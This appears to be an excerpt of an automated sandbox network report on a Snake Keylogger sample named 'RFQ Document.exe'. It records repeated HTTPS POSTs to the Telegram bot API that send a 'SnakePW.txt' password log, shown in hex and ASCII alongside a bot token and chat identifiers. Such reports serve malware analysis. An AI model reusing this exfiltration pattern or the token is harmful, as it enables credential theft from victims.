                                            Data Ascii: --------------------------8d98255fbffa78bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC531INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC531INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12919,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            336192.168.2.450173149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:06 UTC532OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc19e195
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:06 UTC532OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 31 39 65 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc19e195Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC532INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC533INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12920,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            337192.168.2.450174149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:06 UTC533OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc367db4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:06 UTC534OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 33 36 37 64 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc367db4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC534INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12921,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            338192.168.2.450175149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:06 UTC535OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc50b76f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:06 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 35 30 62 37 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc50b76fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC536INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12922,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            339192.168.2.450176149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:06 UTC536OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc6d5398
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:06 UTC537OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 36 64 35 33 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc6d5398Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:06 UTC537INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:06 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:06 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12923,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808806,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            34192.168.2.449810149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:27 UTC54OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c5f64e24
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:27 UTC54OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 66 36 34 65 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c5f64e24Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:27 UTC54INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:27 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:27 UTC55INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12615,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            340192.168.2.450177149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:07 UTC538OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc852b9a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:07 UTC538OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 38 35 32 62 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc852b9aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:07 UTC539INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:07 UTC539INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12924,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808807,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            341192.168.2.450178149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:07 UTC540OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fca1c74e
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:07 UTC540OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 61 31 63 37 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fca1c74eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:07 UTC540INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:07 GMT
                                            Content-Type: application/json
                                            Content-Length: 519
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
